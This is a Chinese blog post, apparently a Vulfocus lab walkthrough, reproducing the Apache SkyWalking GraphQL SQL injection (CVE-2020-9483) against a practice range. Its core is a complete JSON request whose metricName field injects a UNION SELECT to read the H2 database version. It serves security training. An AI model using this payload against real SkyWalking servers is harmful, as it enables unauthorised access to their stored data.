[Vulfocus解题系列]skywalking SQL注入 (CVE-2020-9483)

最新推荐文章于 2023-08-21 16:02:56 发布
最新推荐文章于 2023-08-21 16:02:56 发布
阅读量3.7k 收藏 7
点赞数
分类专栏: 漏洞复现 文章标签: sql 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45813980/article/details/122453199
版权

描述

Apache SkyWalking是美国阿帕奇软件(Apache Software)基金会的一款主要用于微服务、云原生和基于容器等环境的应用程序性能监视器。 当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。

复现过程

注:本次复现使用在线靶场http://vulfocus.fofa.so
在这里插入图片描述
打开环境
在这里插入图片描述
加上路径抓包 /graphql
在这里插入图片描述
改成post,加上payload,利用报错注入获取版本


{
    "query":"query queryLogs($condition: LogQueryCondition) {
  queryLogs(condition: $condition) {
    total
    logs {
      serviceId
      serviceName
      isError
      content
    }
  }
}
",
    "variables":{
        "condition":{
            "metricName":"INFORMATION_SCHEMA.USERS union all select h2version())a where 1=? or 1=? or 1=? --",
                        "endpointId":"1",
                    "traceId":"1",
                    "state":"ALL",
                    "stateCode":"1",
            "paging":{
                "pageSize":10
            }
        }
    }
}

在这里插入图片描述
获取成功
在这里插入图片描述

00勇士王子
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
Victor CMS SQL注入漏洞(CVE-2022-28060)
千寻的博客
11-28 1527
Victor CMS v1.0 /includes/login.php 存在sql注入
Apache-Skywalking-SQL注入复现+利用(CVE-2020-9483)
0xSec
03-12 1293
当Apache SkyWalking使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。
SQL注入攻击总结篇
MSB_WLAQ的博客
10-13 1503
本文是关于SQL各种类型数据库的注入攻击自我复习总结,如果文中有不足的地方,麻烦大佬在评论中指出或者私聊我,谢谢~ 本文讲述: SQL注入的原理 SQL注入的防御 SQL攻击的流程 其他数据库的注入方法 ———————————————————————————— sqll注入原理 当用户访问动态网页时,Web服务器会想数据访问层发起SQL查询请求,若此时攻击者在当前网页构造恶意SQL语句,并一起带入数据库执行,那么会带来意想不到的危害。例如获取/篡改业务核心数据,获取服务器权限,严重可导致数据库瘫痪。
SQLServer数据库注入-墨者学院(SQL手工注入漏洞测试(Sql Server数据库))
T1ngSh0w的博客
09-07 1225
SQLServer数据库注入-墨者学院-SQL手工注入漏洞测试(Sql Server数据库)详细讲解
Apache Skywalking <= 8.3 SQL注入(漏洞分析|snort规则编写)
weixin_68999845的博客
08-21 1076
Apache Skywalking
skywalking-client-js:Apache SkyWalking APM的客户端JavaScript异常和跟踪库
04-13
Apache SkyWalking客户端JS 客户端JavaScript异常和跟踪库。 向SkyWalking后端提供指标和错误收集。 轻的 使浏览器成为整个分布式跟踪的开始 用法 安装 skywalking-client-js运行时库位于 。 npm install ...
skywalking-apm+skywalking-java-agent
04-26
SkyWalking适用于分布式系统的应用程序性能监控工具,专为微服务、云原生和基于容器 (Kubernetes) 的架构而设计。 SkyWalking在8.8.0版本以后将agent进行了单独拆分,因此若要使用8.8.0版本以后的,需要下载apm和...
skywalking8.9.1+skywalking-java-agent 8.9.0+2.0.1
03-12
skywalking从入门到精通(附源码)的配套资源。
skywalking-nginx-lua:用于Apache SkyWalking的Nginx Lua代理
02-03
Apache SkyWalking Nginx代理 Nginx代理为由Nginx LUA模块提供支持的Nginx提供了本机跟踪功能。 该代理遵循SkyWalking跟踪和标头协议。 它通过HTTP协议向SkyWalking APM报告跟踪数据。 该代理可以收集所有通过...
apache-skywalking-java-agent-8.9.0
05-21
apache-skywalking-java-agent-8.9.0 主要监控 jvm 服务
HMS:医院管理系统
03-11
HMS:医院管理系统
CVE-2020-9483】Apache SkyWalking 存在的SQL注入漏洞复现
weixin_43923736的博客
06-02 1772
CVE-2020-9483】Apache SkyWalking 存在的SQL注入漏洞复现
[Vulfocus解题系列]pbootcms SQL注入CVE-2018-16356)
00勇士王子的博客
01-12 7173
简介 PbootCMS是一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。 PbootCMS中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 后台路径:/admin.php 用户名密码:admin:123456 授权码自行获取:https://www.pbootcms.com/freesn/ 靶场搭建 使用在线靶场http://vulfocus.fofa.so 进入环境,发现需要获取授权码 https://www.pboot
youdiancms 9.5.0 版本 SQL注入vulfocus复现)
qq_40646572的博客
04-24 1127
从上述信息,可以看到,web服务的80端口被映射到62461端口,并且该服务对外开启了3306端口并映射到20130 端口。并且给了数据库的相关信息。
[Vulfocus解题系列] phpmyadmin SQL注入CVE-2020-5504)
00勇士王子的博客
10-01 3678
漏洞介绍 名称: phpmyadmin SQL注入CVE-2020-5504) 描述: phpMyAdmin是Phpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。 解题过程 1.访问题目环境,因为这个漏洞是phpmyadmin的后台漏洞,
复现CVE-2020-11022/11023(jQuery XSS漏洞)
记录并分享学习安全的知识点..
05-31 5763
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 一、漏洞描述 由于执行了消毒(sanitize)处理,也仍会执行将来自不受信任来源的HTML传递给jQuery的DOM操作方法(即html()、.append()等),从而导致xss漏洞。 二、影响版本 大于或等于1.2且在3.5.0之前的jQuery版本中 三、漏洞复现 poc如下: <!DOCTYPE html> <html> <head> &lt...
Apache SkyWalking SQL注入漏洞(CVE-2020-9483)复现
锋刃科技的博客
03-05 2195
简介 Apache Skywalking是一款针对分布式系统的应用程序性能监视工具,为微服务,云原生和基于容器(Docker,Kubernetes,Mesos)的体系结构而设计。 影响版本 Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 环境搭建 这里下载6.5.0进行搭建 下载地址 https://archive.apache.org/dist/skywalking/6.5.0/apache-skywalking-apm-6.5.0.ta...
[Vulfocus解题系列] nexus 远程代码执行 (CVE-2020-10199/10204)
00勇士王子的博客
07-13 1334
漏洞介绍 名称: nexus 远程代码执行 (CVE-2020-10199/10204) 描述: Nexus Repository Manager(NXRM)是美国Sonatype公司的一款Maven仓库管理器。 CVE-2020-10199的漏洞需要普通用户权限即可触发,而CVE-2020-10204则需要管理员权限。两个漏洞的触发原因均是不安全的执行EL表达式导致的. 解题过程 1.打开靶场 2.登录 弱口令 admin/admin 2.抓包获取登录后的cookie及scrf属性; ...
Spring 目录遍历 (CVE-2020-5410)~vulfocus/spring-cve_2020_5410:latest
qq_34341458的博客
04-11 4014
0x01 描述 Spring Cloud Config是美国威睿(VMware)公司的一套分布式系统的配置管理解决方案。该产品主要为分布式系统中的外部配置提供服务器和客户端支持。 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。 0x02 靶场地址 靶场地址:http://v
helm install -n skywalking skywalking /root/skywalking --values /root/skywalking/values-my-es.yaml
最新发布
12-27
以下是使用Helm安装Apache SkyWalking的示例命令: ```shell helm install -n skywalking skywalking /root/skywalking --values /root/skywalking/values-my-es.yaml ``` 这个命令将会使用Helm安装Apache SkyWalking,并指定了一个自定义的values文件`values-my-es.yaml`来配置Elasticsearch。其中,`-n skywalking`参数指定了安装的名称为`skywalking`,`skywalking`参数指定了要安装的Chart包的路径为`/root/skywalking`,`--values /root/skywalking/values-my-es.yaml`参数指定了使用自定义的values文件来配置安装。 请注意,如果你的Elasticsearch无法通过默认的方式访问,你需要根据你的环境配置相应的访问方式,比如使用NodePort或Ingress来访问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值